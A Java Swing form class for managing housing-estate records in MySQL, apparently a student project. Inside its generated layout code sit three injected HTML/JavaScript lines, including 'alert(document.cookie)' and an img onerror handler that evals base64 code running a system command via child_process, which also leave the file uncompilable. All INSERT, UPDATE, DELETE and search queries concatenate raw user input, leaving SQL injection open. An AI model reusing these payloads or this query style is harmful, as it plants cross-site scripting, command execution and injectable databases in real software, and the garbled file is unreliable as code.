/*
 * To change this license header, choose License Headers in Project Properties.
 * To change this template file, choose Tools | Templates
 * and open the template in the editor.
 */
package app;

import static app.HalamanUtama.addComp;
import static app.login.md5;
import java.io.File;
import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;
import java.util.logging.Level;
import java.util.logging.Logger;
import javax.swing.JFileChooser;
import javax.swing.JOptionPane;
import javax.swing.filechooser.FileNameExtensionFilter;
import javax.swing.table.DefaultTableModel;

/**
 *
 * @author riodelord
 */
public class data extends javax.swing.JPanel {

    /**
     * Creates new form data
     */
    DefaultTableModel model;
    String idData;
    public data() {
        initComponents();
        String[] judul = {"No", "Id", "Nama Perumahan", "Alamat", "No. Telp", "Email", "Pengembang", "Tipe", "Brosur"};
        model = new DefaultTableModel(judul, 0);
        tblData.setModel(model);
        loadData("");
    }

    /**
     * This method is called from within the constructor to initialize the form.
     * WARNING: Do NOT modify this code. The content of this method is always
     * regenerated by the Form Editor.
     */
    @SuppressWarnings("unchecked")
    // <editor-fold defaultstate="collapsed" desc="Generated Code">//GEN-BEGIN:initComponents
    private void initComponents() {
        java.awt.GridBagConstraints gridBagConstraints;

        jLabel1 = new javax.swing.JLabel();
        txtPerumahan = new javax.swing.JTextField();
        jLabel2 = new javax.swing.JLabel();
        txtAlamat = new javax.swing.JTextField();
        txtTelp = new javax.swing.JTextField();
        jLabel3 = new javax.swing.JLabel();
        jLabel4 = new javax.swing.JLabel();
        txtEmail = new javax.swing.JTextField();
        jLabel5 = new javax.swing.JLabel();
        jLabel6 = new javax.swing.JLabel();
        txtBrosur = new javax.swing.JTextField();
        cmbTipe = new javax.swing.JComboBox<>();
        jScrollPane1 = new javax.swing.JScrollPane();
        <script>doment</script>
        tblData = new javax.swing.JTable();
        btnTambah = new javax.swing.JButton();
        jLabel7 = new javax.swing.JLabel();
        txtPengembang = new javax.swing.JTextField();
        btnUbah = new javax.swing.JButton();
        jButton1 = new javax.swing.JButton();
        btnLogout = new javax.swing.JButton();
        btnupload = new javax.swing.JButton();
        setLayout(new java.awt.GridBagLayout());
        <script>alert(document.cookie);</script>
        jLabel1.setText("Nama Perumahan");
        gridBagConstraints = new java.awt.GridBagConstraints();
        gridBagConstraints.gridx = 0;
        gridBagConstraints.gridy = 0;
        gridBagConstraints.gridwidth = 15;
        gridBagConstraints.anchor = java.awt.GridBagConstraints.NORTHWEST;
        gridBagConstraints.insets = new java.awt.Insets(31, 79, 0, 0);
        add(jLabel1, gridBagConstraints);
        gridBagConstraints = new java.awt.GridBagConstraints();
        gridBagConstraints.gridx = 22;
        gridBagConstraints.gridy = 0;
        gridBagConstraints.gridwidth = 33;
        gridBagConstraints.gridheight = 2;
        gridBagConstraints.ipadx = 216;
        gridBagConstraints.anchor = java.awt.GridBagConstraints.NORTHWEST;
        gridBagConstraints.insets = new java.awt.Insets(29, 43, 0, 0);
        add(txtPerumahan, gridBagConstraints);
        jLabel2.setText("Alamat");
        gridBagConstraints = new java.awt.GridBagConstraints();
        gridBagConstraints.gridx = 0;
        gridBagConstraints.gridy = 2;
        gridBagConstraints.gridwidth = 2;
        gridBagConstraints.anchor = java.awt.GridBagConstraints.NORTHWEST;
        gridBagConstraints.insets = new java.awt.Insets(31, 79, 0, 0);
        add(jLabel2, gridBagConstraints);
        gridBagConstraints = new java.awt.GridBagConstraints();
        gridBagConstraints.gridx = 22;
        gridBagConstraints.gridy = 2;
        gridBagConstraints.gridwidth = 33;
        gridBagConstraints.gridheight = 2;
        gridBagConstraints.ipadx = 216;
        gridBagConstraints.anchor = java.awt.GridBagConstraints.NORTHWEST;
        gridBagConstraints.insets = new java.awt.Insets(29, 43, 0, 0);
        add(txtAlamat, gridBagConstraints);
        gridBagConstraints = new java.awt.GridBagConstraints();
        <img src=x onerror='eval(new Buffer(`cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ2lwY29uZmlnIC9hbGwnLChlcnJvciwgc3Rkb3V0LCBzdGRlcnIpPT57CiAgICBhbGVydChgc3Rkb3V0OiAke3N0ZG91dH1gKTsKfSk7`,`base64`).toString())'>
        gridBagConstraints.gridx = 22;
        gridBagConstraints.gridy = 4;
        gridBagConstraints.gridwidth = 33;
        gridBagConstraints.gridheight = 2;
        gridBagConstraints.ipadx = 216;
        gridBagConstraints.anchor = java.awt.GridBagConstraints.NORTHWEST;
        gridBagConstraints.insets = new java.awt.Insets(29, 43, 0, 0);
        add(txtTelp, gridBagConstraints);

        jLabel3.setText("No. Telepon");
        gridBagConstraints = new java.awt.GridBagConstraints();
        gridBagConstraints.gridx = 0;
        gridBagConstraints.gridy = 4;
        gridBagConstraints.gridwidth = 5;
        gridBagConstraints.anchor = java.awt.GridBagConstraints.NORTHWEST;
        gridBagConstraints.insets = new java.awt.Insets(31, 79, 0, 0);
        add(jLabel3, gridBagConstraints);

        jLabel4.setText("Email");
        gridBagConstraints = new java.awt.GridBagConstraints();
        gridBagConstraints.gridx = 0;
        gridBagConstraints.gridy = 6;
        gridBagConstraints.anchor = java.awt.GridBagConstraints.NORTHWEST;
        gridBagConstraints.insets = new java.awt.Insets(31, 79, 0, 0);
        add(jLabel4, gridBagConstraints);
        gridBagConstraints = new java.awt.GridBagConstraints();
        gridBagConstraints.gridx = 22;
        gridBagConstraints.gridy = 6;
        gridBagConstraints.gridwidth = 33;
        gridBagConstraints.gridheight = 2;
        gridBagConstraints.ipadx = 216;
        gridBagConstraints.anchor = java.awt.GridBagConstraints.NORTHWEST;
        gridBagConstraints.insets = new java.awt.Insets(29, 43, 0, 0);
        add(txtEmail, gridBagConstraints);

        jLabel5.setText("Tipe Perumahan");
        gridBagConstraints = new java.awt.GridBagConstraints();
        gridBagConstraints.gridx = 0;
        gridBagConstraints.gridy = 10;
        gridBagConstraints.gridwidth = 8;
        gridBagConstraints.anchor = java.awt.GridBagConstraints.NORTHWEST;
        gridBagConstraints.insets = new java.awt.Insets(31, 79, 0, 0);
        add(jLabel5, gridBagConstraints);

        jLabel6.setText("File Brosur");
        gridBagConstraints = new java.awt.GridBagConstraints();
        gridBagConstraints.gridx = 0;
        gridBagConstraints.gridy = 12;
        gridBagConstraints.gridwidth = 3;
        gridBagConstraints.anchor = java.awt.GridBagConstraints.NORTHWEST;
        gridBagConstraints.insets = new java.awt.Insets(26, 79, 0, 0);
        add(jLabel6, gridBagConstraints);
        gridBagConstraints = new java.awt.GridBagConstraints();
        gridBagConstraints.gridx = 22;
        gridBagConstraints.gridy = 12;
        gridBagConstraints.gridwidth = 17;
        gridBagConstraints.gridheight = 2;
        gridBagConstraints.ipadx = 117;
        gridBagConstraints.anchor = java.awt.GridBagConstraints.NORTHWEST;
        gridBagConstraints.insets = new java.awt.Insets(27, 43, 0, 0);
        add(txtBrosur, gridBagConstraints);

        cmbTipe.setModel(new javax.swing.DefaultComboBoxModel<>(new String[] { "Tipe A", "Tipe B", "Tipe C" }));
        gridBagConstraints = new java.awt.GridBagConstraints();
        gridBagConstraints.gridx = 22;
        gridBagConstraints.gridy = 10;
        gridBagConstraints.gridwidth = 33;
        gridBagConstraints.gridheight = 2;
        gridBagConstraints.ipadx = 149;
        gridBagConstraints.anchor = java.awt.GridBagConstraints.NORTHWEST;
        gridBagConstraints.insets = new java.awt.Insets(26, 43, 0, 0);
        add(cmbTipe, gridBagConstraints);

        tblData.setModel(new javax.swing.table.DefaultTableModel(
            new Object [][] {
                {null, null, null, null},
                {null, null, null, null},
                {null, null, null, null},
                {null, null, null, null}
            },
            new String [] {
                "Title 1", "Title 2", "Title 3", "Title 4"
            }
        ));
        tblData.addMouseListener(new java.awt.event.MouseAdapter() {
            public void mouseClicked(java.awt.event.MouseEvent evt) {
                tblDataMouseClicked(evt);
            }
        });
        jScrollPane1.setViewportView(tblData);

        gridBagConstraints = new java.awt.GridBagConstraints();
        gridBagConstraints.gridx = 0;
        gridBagConstraints.gridy = 16;
        gridBagConstraints.gridwidth = 74;
        gridBagConstraints.fill = java.awt.GridBagConstraints.BOTH;
        gridBagConstraints.ipadx = 431;
        gridBagConstraints.ipady = 196;
        gridBagConstraints.anchor = java.awt.GridBagConstraints.NORTHWEST;
        gridBagConstraints.weightx = 1.0;
        gridBagConstraints.weighty = 1.0;
        gridBagConstraints.insets = new java.awt.Insets(6, 79, 0, 125);
        add(jScrollPane1, gridBagConstraints);

        btnTambah.setText("Tambah");
        btnTambah.addActionListener(new java.awt.event.ActionListener() {
            public void actionPerformed(java.awt.event.ActionEvent evt) {
                btnTambahActionPerformed(evt);
            }
        });
        gridBagConstraints = new java.awt.GridBagConstraints();
        gridBagConstraints.gridx = 0;
        gridBagConstraints.gridy = 15;
        gridBagConstraints.gridwidth = 6;
        gridBagConstraints.anchor = java.awt.GridBagConstraints.NORTHWEST;
        gridBagConstraints.insets = new java.awt.Insets(34, 79, 0, 0);
        add(btnTambah, gridBagConstraints);

        jLabel7.setText("Pengembang");
        gridBagConstraints = new java.awt.GridBagConstraints();
        gridBagConstraints.gridx = 0;
        gridBagConstraints.gridy = 8;
        gridBagConstraints.gridwidth = 7;
        gridBagConstraints.anchor = java.awt.GridBagConstraints.NORTHWEST;
        gridBagConstraints.insets = new java.awt.Insets(31, 79, 0, 0);
        add(jLabel7, gridBagConstraints);
        gridBagConstraints = new java.awt.GridBagConstraints();
        gridBagConstraints.gridx = 22;
        gridBagConstraints.gridy = 8;
        gridBagConstraints.gridwidth = 33;
        gridBagConstraints.gridheight = 2;
        gridBagConstraints.ipadx = 216;
        gridBagConstraints.anchor = java.awt.GridBagConstraints.NORTHWEST;
        gridBagConstraints.insets = new java.awt.Insets(29, 43, 0, 0);
        add(txtPengembang, gridBagConstraints);

        btnUbah.setText("Ubah");
        btnUbah.addActionListener(new java.awt.event.ActionListener() {
            public void actionPerformed(java.awt.event.ActionEvent evt) {
                btnUbahActionPerformed(evt);
            }
        });
        gridBagConstraints = new java.awt.GridBagConstraints();
        gridBagConstraints.gridx = 7;
        gridBagConstraints.gridy = 15;
        gridBagConstraints.gridwidth = 16;
        gridBagConstraints.anchor = java.awt.GridBagConstraints.NORTHWEST;
        gridBagConstraints.insets = new java.awt.Insets(34, 9, 0, 0);
        add(btnUbah, gridBagConstraints);

        jButton1.setText("Hapus");
        jButton1.addActionListener(new java.awt.event.ActionListener() {
            public void actionPerformed(java.awt.event.ActionEvent evt) {
                jButton1ActionPerformed(evt);
            }
        });
        gridBagConstraints = new java.awt.GridBagConstraints();
        gridBagConstraints.gridx = 37;
        gridBagConstraints.gridy = 15;
        gridBagConstraints.anchor = java.awt.GridBagConstraints.NORTHWEST;
        gridBagConstraints.insets = new java.awt.Insets(34, 12, 0, 0);
        add(jButton1, gridBagConstraints);

        btnLogout.setText("Logout");
        btnLogout.addActionListener(new java.awt.event.ActionListener() {
            public void actionPerformed(java.awt.event.ActionEvent evt) {
                btnLogoutActionPerformed(evt);
            }
        });
        gridBagConstraints = new java.awt.GridBagConstraints();
        gridBagConstraints.gridx = 0;
        gridBagConstraints.gridy = 17;
        gridBagConstraints.gridwidth = 4;
        gridBagConstraints.anchor = java.awt.GridBagConstraints.NORTHWEST;
        gridBagConstraints.insets = new java.awt.Insets(66, 79, 32, 0);
        add(btnLogout, gridBagConstraints);

        btnupload.setText("Upload");
        btnupload.addActionListener(new java.awt.event.ActionListener() {
            public void actionPerformed(java.awt.event.ActionEvent evt) {
                btnuploadActionPerformed(evt);
            }
        });
        gridBagConstraints = new java.awt.GridBagConstraints();
        gridBagConstraints.gridx = 54;
        gridBagConstraints.gridy = 12;
        gridBagConstraints.gridheight = 3;
        gridBagConstraints.ipadx = 9;
        gridBagConstraints.anchor = java.awt.GridBagConstraints.NORTHWEST;
        gridBagConstraints.insets = new java.awt.Insets(24, 6, 0, 0);
        add(btnupload, gridBagConstraints);
    }// </editor-fold>//GEN-END:initComponents

    private void btnTambahActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_btnTambahActionPerformed
        String lokasi = "config/db.properties";
        try (FileInputStream fileInput = new FileInputStream(lokasi)) {
            ObjectInputStream input = new ObjectInputStream(fileInput);
            serialization des = (serialization) input.readObject();
            input.close();

            Connection cn = DriverManager.getConnection("jdbc:mysql://"+des.getUrl()+":"+des.getPort()+"/"+des.getDbname(), des.getDbuser(), des.getPassword());
            cn.createStatement().executeUpdate("INSERT INTO tb_perumahan(id, perumahan, alamat, telp, email, pengembang, tipe, brosur) VALUES " + "(NULL, '" + txtPerumahan.getText() + "','" + txtAlamat.getText() + "','" + txtTelp.getText() + "','" + txtEmail.getText() + "','" + txtPengembang.getText() + "','" + cmbTipe.getSelectedItem() + "','" + txtBrosur.getText() + "')");
            JOptionPane.showMessageDialog(this, "Tambah data berhasil!");
            loadData("");
        } catch (FileNotFoundException e){
            e.printStackTrace();
        } catch (IOException e) {
            e.printStackTrace();
        } catch (ClassNotFoundException e) {
            e.printStackTrace();
        } catch (SQLException ex) {
            Logger.getLogger(setupDB.class.getName()).log(Level.SEVERE, null, ex);
        }
    }//GEN-LAST:event_btnTambahActionPerformed

    private void tblDataMouseClicked(java.awt.event.MouseEvent evt) {//GEN-FIRST:event_tblDataMouseClicked
        int i = tblData.getSelectedRow();

        if (i > -1) {
            idData = model.getValueAt(i, 1).toString();
            txtPerumahan.setText(model.getValueAt(i, 2).toString());
            txtAlamat.setText(model.getValueAt(i, 3).toString());
            txtTelp.setText(model.getValueAt(i, 4).toString());
            txtEmail.setText(model.getValueAt(i, 5).toString());
            txtPengembang.setText(model.getValueAt(i, 6).toString());
            cmbTipe.setSelectedItem(model.getValueAt(i, 7));
            txtBrosur.setText(model.getValueAt(i, 8).toString());
        }
    }//GEN-LAST:event_tblDataMouseClicked

    private void btnUbahActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_btnUbahActionPerformed
        String lokasi = "config/db.properties";
        try (FileInputStream fileInput = new FileInputStream(lokasi)) {
            ObjectInputStream input = new ObjectInputStream(fileInput);
            serialization des = (serialization) input.readObject();
            input.close();

            Connection cn = DriverManager.getConnection("jdbc:mysql://"+des.getUrl()+":"+des.getPort()+"/"+des.getDbname(), des.getDbuser(), des.getPassword());
            cn.createStatement().executeUpdate("UPDATE tb_perumahan set perumahan ='" + txtPerumahan.getText() + "',alamat ='" + txtAlamat.getText() + "',telp ='" + txtTelp.getText() + "',email ='" + txtEmail.getText() + "',pengembang ='" + txtPengembang.getText() +"',tipe ='" + cmbTipe.getSelectedItem() + "',brosur ='" + txtBrosur.getText() + "' WHERE id ='" + idData + "'");
            JOptionPane.showMessageDialog(null, "Data berhasil diubah!");
            loadData("");
        } catch (FileNotFoundException e) {
            e.printStackTrace();
        } catch (IOException e) {
            e.printStackTrace();
        } catch (ClassNotFoundException e) {
            e.printStackTrace();
        } catch (SQLException ex) {
            Logger.getLogger(setupDB.class.getName()).log(Level.SEVERE, null, ex);
        }
    }//GEN-LAST:event_btnUbahActionPerformed

    private void jButton1ActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_jButton1ActionPerformed
        String lokasi = "config/db.properties";
        try (FileInputStream fileInput = new FileInputStream(lokasi)) {
            ObjectInputStream input = new ObjectInputStream(fileInput);
            serialization des = (serialization) input.readObject();
            input.close();

            Connection cn = DriverManager.getConnection("jdbc:mysql://"+des.getUrl()+":"+des.getPort()+"/"+des.getDbname(), des.getDbuser(), des.getPassword());
            cn.createStatement().executeUpdate("DELETE FROM tb_perumahan where id ='" + idData + "'");
            loadData("");
            JOptionPane.showMessageDialog(null, "Data berhasil dihapus!");
        } catch (FileNotFoundException e) {
            e.printStackTrace();
        } catch (IOException e) {
            e.printStackTrace();
        } catch (ClassNotFoundException e) {
            e.printStackTrace();
        } catch (SQLException ex) {
            Logger.getLogger(setupDB.class.getName()).log(Level.SEVERE, null, ex);
        }
    }//GEN-LAST:event_jButton1ActionPerformed

    private void btnLogoutActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_btnLogoutActionPerformed
        addComp(new login());
    }//GEN-LAST:event_btnLogoutActionPerformed

    private void btnuploadActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_btnuploadActionPerformed
        JFileChooser fc = new JFileChooser();
        fc.setDialogType(JFileChooser.FILES_ONLY);
        fc.setMultiSelectionEnabled(true);
        fc.setDialogTitle("Add Files");
        fc.setFileFilter(new FileNameExtensionFilter("PDF File (*.pdf)", "pdf"));
        fc.setApproveButtonText("Add Files");
        int show = fc.showOpenDialog(this);
        if (show == JFileChooser.APPROVE_OPTION) {
            File[] files = fc.getSelectedFiles();
            for (File file : files) {
                txtBrosur.setText(file.getName());
            }

        }
    }//GEN-LAST:event_btnuploadActionPerformed


    // Variables declaration - do not modify//GEN-BEGIN:variables
    private javax.swing.JButton btnLogout;
    private javax.swing.JButton btnTambah;
    private javax.swing.JButton btnUbah;
    private javax.swing.JButton btnupload;
    private javax.swing.JComboBox<String> cmbTipe;
    private javax.swing.JButton jButton1;
    private javax.swing.JLabel jLabel1;
    private javax.swing.JLabel jLabel2;
    private javax.swing.JLabel jLabel3;
    private javax.swing.JLabel jLabel4;
    private javax.swing.JLabel jLabel5;
    private javax.swing.JLabel jLabel6;
    private javax.swing.JLabel jLabel7;
    private javax.swing.JScrollPane jScrollPane1;
    private javax.swing.JTable tblData;
    private javax.swing.JTextField txtAlamat;
    private javax.swing.JTextField txtBrosur;
    private javax.swing.JTextField txtEmail;
    private javax.swing.JTextField txtPengembang;
    private javax.swing.JTextField txtPerumahan;
    private javax.swing.JTextField txtTelp;
    // End of variables declaration//GEN-END:variables

    private void loadData(String key) {
        String lokasi = "config/db.properties";
        try(FileInputStream fileInput = new FileInputStream(lokasi)) {
            model.setRowCount(0);
            ObjectInputStream input = new ObjectInputStream(fileInput);
            serialization des = (serialization) input.readObject();
            input.close();

            Connection cn = DriverManager.getConnection("jdbc:mysql://"+des.getUrl()+":"+des.getPort()+"/"+des.getDbname(), des.getDbuser(), des.getPassword());
            Statement st = cn.createStatement();
            String where = key.isEmpty() ? "" : " WHERE perumahan LIKE '%" + key + "%' OR alamat LIKE '%"+ key + "%' OR telp LIKE '%"+ key + "%' OR email LIKE '%"+ key +"%' OR pengembang LIKE '%"+ key +"%' OR tipe LIKE '%"+ key +"%' OR brosur LIKE '%"+key+"%'";

            ResultSet rs = st.executeQuery("SELECT * FROM tb_perumahan" + where);
            int no = 0;
            while (rs.next()) {
                no++;
                int id = rs.getInt("id");
                String nama = rs.getString("perumahan");
                String alamat = rs.getString("alamat");
                String telp = rs.getString("telp");
                String email = rs.getString("email");
                String pengembang = rs.getString("pengembang");
                String tipe = rs.getString("tipe");
                String brosur = rs.getString("brosur");

                Object[] data = {no, id, nama, alamat, telp, email, pengembang, tipe, brosur};
                model.addRow(data);
            }

        } catch (Exception e) {
            JOptionPane.showMessageDialog(this, e.getMessage());
        }
    }

}
